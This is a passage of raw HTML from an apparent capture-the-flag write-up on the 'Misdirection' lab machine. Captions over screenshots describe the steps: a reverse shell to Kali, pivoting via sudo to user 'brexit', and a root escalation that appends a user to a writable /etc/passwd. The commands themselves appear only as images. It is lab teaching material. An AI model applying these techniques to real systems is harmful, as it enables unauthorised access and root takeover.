medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWlzL66502WKJdlb3MxOQ2RpNjrNdBB80XLJVEpHBdirvb0Xgv_Aaq0aaf1TmNSwYusnJI4x2PBU5dbah-0SGQxXTvWSp6-AuGW8PLpj46D1UsOGQ2l5BecW8uUPcO2fIK965D_mY8bYXW/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;73&quot; data-original-width=&quot;397&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWlzL66502WKJdlb3MxOQ2RpNjrNdBB80XLJVEpHBdirvb0Xgv_Aaq0aaf1TmNSwYusnJI4x2PBU5dbah-0SGQxXTvWSp6-AuGW8PLpj46D1UsOGQ2l5BecW8uUPcO2fIK965D_mY8bYXW/s16000/screenshot.13.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Sending a reverse shell command from Misdirection to Kali:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFpp85sGMHb7FWZjtkzJCWQfOKhTxuVVPrCW9V_HRgxWguGJtOIeXhhBLRE-EgV8zM2s545NxtR8MlzsfPIpkou2eS0S4IC2w4-NrWSPbVf4ZrLfX8d0296kLFJujt5bLdcET4q84WzZt9/&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;49&quot; data-original-width=&quot;584&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFpp85sGMHb7FWZjtkzJCWQfOKhTxuVVPrCW9V_HRgxWguGJtOIeXhhBLRE-EgV8zM2s545NxtR8MlzsfPIpkou2eS0S4IC2w4-NrWSPbVf4ZrLfX8d0296kLFJujt5bLdcET4q84WzZt9/s16000/screenshot.12.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Finally a remote shell is triggered:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkFtNRAelYVeUCKu8PIRgZIXTpXXTBR_TQrPtXiKdgBsPhWQCE9VcSf9kUAugjA6oFVKUeZkk4zbeNeZgvPb-b4XebOu5mJH0K4nsImNaIFHWherSXWd1E-fWpWxS8i1gz-N0LPCAzvY_E/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;168&quot; data-original-width=&quot;696&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkFtNRAelYVeUCKu8PIRgZIXTpXXTBR_TQrPtXiKdgBsPhWQCE9VcSf9kUAugjA6oFVKUeZkk4zbeNeZgvPb-b4XebOu5mJH0K4nsImNaIFHWherSXWd1E-fWpWxS8i1gz-N0LPCAzvY_E/s16000/screenshot.14.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Improving the shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2JU0yQjCoPjRlw14vAq9clCdXs9fLe8BQVOEu7JaZywRrvHwuhfRAn6zmzXzYl6YakofeTSrlm1vEhzFeF4EZCSB4gNqRiLUF9_TK3an-VI_7YMmgE-ZDmaTEGzzXEXLdykLszgztoyiq/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;47&quot; data-original-width=&quot;540&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2JU0yQjCoPjRlw14vAq9clCdXs9fLe8BQVOEu7JaZywRrvHwuhfRAn6zmzXzYl6YakofeTSrlm1vEhzFeF4EZCSB4gNqRiLUF9_TK3an-VI_7YMmgE-ZDmaTEGzzXEXLdykLszgztoyiq/s16000/screenshot.18.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to folder&amp;nbsp;&lt;b&gt;/home&lt;/b&gt; we discover the user &lt;b&gt;brexit&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioaQwH29Z1AVJZR1GCbPABVsGjpwtXNOppEEeu_p7yhzIWsGXW70br4ADYJJGmQsTS6d8B5whMdfAsyK3YgdNdvR7rsf4jliOEI4kyBQsz81ejaK_H9i_HEXKY5E_-h14IY-gnmfR0iBHp/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;185&quot; data-original-width=&quot;611&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioaQwH29Z1AVJZR1GCbPABVsGjpwtXNOppEEeu_p7yhzIWsGXW70br4ADYJJGmQsTS6d8B5whMdfAsyK3YgdNdvR7rsf4jliOEI4kyBQsz81ejaK_H9i_HEXKY5E_-h14IY-gnmfR0iBHp/s16000/screenshot.19.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;4 - CAPTURING 1st FLAG&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Trying to read &lt;b&gt;user.txt&lt;/b&gt; the access is denied:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgebmSiMry9_zHthyphenhyphenxrZo8gCOGYSuq-RObg8pLn0jO3QBqk6vbpN76d_vmy5-NDxslbDiZthXa0gBH52OQDISL18gInqzZIJzZ4BQNDxaDfaVyUKePnVdXy34k7cGRg3WZmWvM0KBnx0Ooe/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;646&quot; data-original-width=&quot;709&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgebmSiMry9_zHthyphenhyphenxrZo8gCOGYSuq-RObg8pLn0jO3QBqk6vbpN76d_vmy5-NDxslbDiZthXa0gBH52OQDISL18gInqzZIJzZ4BQNDxaDfaVyUKePnVdXy34k7cGRg3WZmWvM0KBnx0Ooe/s16000/screenshot.20.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Checking &lt;b&gt;www-data&lt;/b&gt;&#39;s sudoer privileges we discover he can run &lt;b&gt;/bin/bash&lt;/b&gt; as user &lt;b&gt;brexit&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnSIYJBUOiuISevM_SmVa1_JAlf44NOxfs7N_ASX4vaeU_W5p_RzVRVknjX04aKygMcO2OGskCQ0FlTR5hzIzYb4i63QGZOwtsYZ7kR0edapOB7p-u7rjVEycKrEZjkvEZgKk6Udhaz82B/&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;185&quot; data-original-width=&quot;677&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnSIYJBUOiuISevM_SmVa1_JAlf44NOxfs7N_ASX4vaeU_W5p_RzVRVknjX04aKygMcO2OGskCQ0FlTR5hzIzYb4i63QGZOwtsYZ7kR0edapOB7p-u7rjVEycKrEZjkvEZgKk6Udhaz82B/s16000/screenshot.22.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Switching to user &lt;b&gt;brexi&lt;/b&gt;t:&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfgKywngFeWV9RCZ5OotCH0sY3X-RCeo20Q3UYlBsHVbCfQ6xOKOjevsSC4THbzFdMwRs9WxatCB4cr4DDp6fZ30mwvPxe6JjUXnD37E7tiE4zGXaQfMp-ABnlk1D8Xw7vg_FTD6S_aP-x/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;116&quot; data-original-width=&quot;624&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfgKywngFeWV9RCZ5OotCH0sY3X-RCeo20Q3UYlBsHVbCfQ6xOKOjevsSC4THbzFdMwRs9WxatCB4cr4DDp6fZ30mwvPxe6JjUXnD37E7tiE4zGXaQfMp-ABnlk1D8Xw7vg_FTD6S_aP-x/s16000/screenshot.23.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now we can read&amp;nbsp;&lt;b&gt;user.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW_4rnwB55jAimDeA6zWdyypYw0h1-up6rkQevSpKSdo7MWptRxiABSyrIFv_Tojp2Qr3-DR6ReAuEpjAEYS5R8VgAzfsI4fkgeicVfxB2DERApU6BQO43mGMqJG6Jtd7mjLCxEdrfriVl/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;70&quot; data-original-width=&quot;438&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW_4rnwB55jAimDeA6zWdyypYw0h1-up6rkQevSpKSdo7MWptRxiABSyrIFv_Tojp2Qr3-DR6ReAuEpjAEYS5R8VgAzfsI4fkgeicVfxB2DERApU6BQO43mGMqJG6Jtd7mjLCxEdrfriVl/s16000/screenshot.24.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;5 - PRIVILEGE ESCALATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Finding that file &lt;b&gt;/etc/passwd &lt;/b&gt;is writable:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgusEvFtQN6IO7OrzcGUvVgt-6XQsYZvvmHO1kQCJDP8atxpRB-g5dvikjKsxUyaGAqUtp-e_V5QA72b7lKqcNoEDvVl0EIZWbg5-crxzoYIFpAXY-bvIjm08nqT5Ymd3ZFUlZlnIVqUYBh/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;140&quot; data-original-width=&quot;708&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgusEvFtQN6IO7OrzcGUvVgt-6XQsYZvvmHO1kQCJDP8atxpRB-g5dvikjKsxUyaGAqUtp-e_V5QA72b7lKqcNoEDvVl0EIZWbg5-crxzoYIFpAXY-bvIjm08nqT5Ymd3ZFUlZlnIVqUYBh/s16000/screenshot.25.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Creating an encrypted password for a new user:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpXn248PYHK85EtQeOlxg-CZIWhqtqYc48yPGafjYPnOqG-ebhgWIbJ631iZfvYNHlHFHZJcwqkDNG31AeMgqrZZ3aD6I69XxzY7Go9bMz9n377q45llCF9uNVIj6DneZnVfBsslLpUIOi/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;134&quot; data-original-width=&quot;415&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpXn248PYHK85EtQeOlxg-CZIWhqtqYc48yPGafjYPnOqG-ebhgWIbJ631iZfvYNHlHFHZJcwqkDNG31AeMgqrZZ3aD6I69XxzY7Go9bMz9n377q45llCF9uNVIj6DneZnVfBsslLpUIOi/s16000/screenshot.33.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Adding this new line to &lt;b&gt;/etc/passwd&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmsqoRQnR0XHGQBiJQGsIQSfYSJK5mENFamYZ6zqQRtITYHUVWO7UDo-L4ILwQuFwvTpTTiTmsz8gp2a_UlU5nUA7wtmEp372z6NcbDnibhSfdpV-Zo57q_7L4mWMz3s8kZTiGhrLkItzc/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;38&quot; data-original-width=&quot;875&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmsqoRQnR0XHGQBiJQGsIQSfYSJK5mENFamYZ6zqQRtITYHUVWO7UDo-L4ILwQuFwvTpTTiTmsz8gp2a_UlU5nUA7wtmEp372z6NcbDnibhSfdpV-Zo57q_7L4mWMz3s8kZTiGhrLkItzc/s16000/screenshot.29.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3D5hWdkJWkRyK9OXRTuE-y-Mux8XqVDayxPIrVKpsNAMGPHRtAGKWp9Umg1uo2MXm8KCOaejTZytN3wgxEAqAujMFikL_z25KlX4I3w0zGHTHNUegq-4i7PDISuwYvhoroX5xD2ItmXQw/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;50&quot; data-original-width=&quot;1311&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3D5hWdkJWkRyK9OXRTuE-y-Mux8XqVDayxPIrVKpsNAMGPHRtAGKWp9Umg1uo2MXm8KCOaejTZytN3wgxEAqAujMFikL_z25KlX4I3w0zGHTHNUegq-4i7PDISuwYvhoroX5xD2ItmXQw/s16000/screenshot.30.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now switching to &lt;b&gt;newuser&lt;/b&gt; we have a &lt;b&gt;root&lt;/b&gt; shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipEZ30wCDkI1X4lIpSmTBNlvW8ZCvUB2oScWbFeuc1Ucz6zluP_w3ZYSUE6th8zvmGKbExv3atBHLzVt1-tryOuIBL_pImaG-ahvGtJ6S1TnnkAHhtYPF3hyH3gpT9eYlLW8XJhX48QvYy/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;162&quot; data-original-width=&quot;456&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipEZ30wCDkI1X4lIpSmTBNlvW8ZCvUB2oScWbFeuc1Ucz6zluP_w3ZYSUE6th8zvmGKbExv3atBHLzVt1-tryOuIBL_pImaG-ahvGtJ6S1TnnkAHhtYPF3hyH3gpT9eYlLW8XJhX48QvYy/s16000/screenshot.31.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br 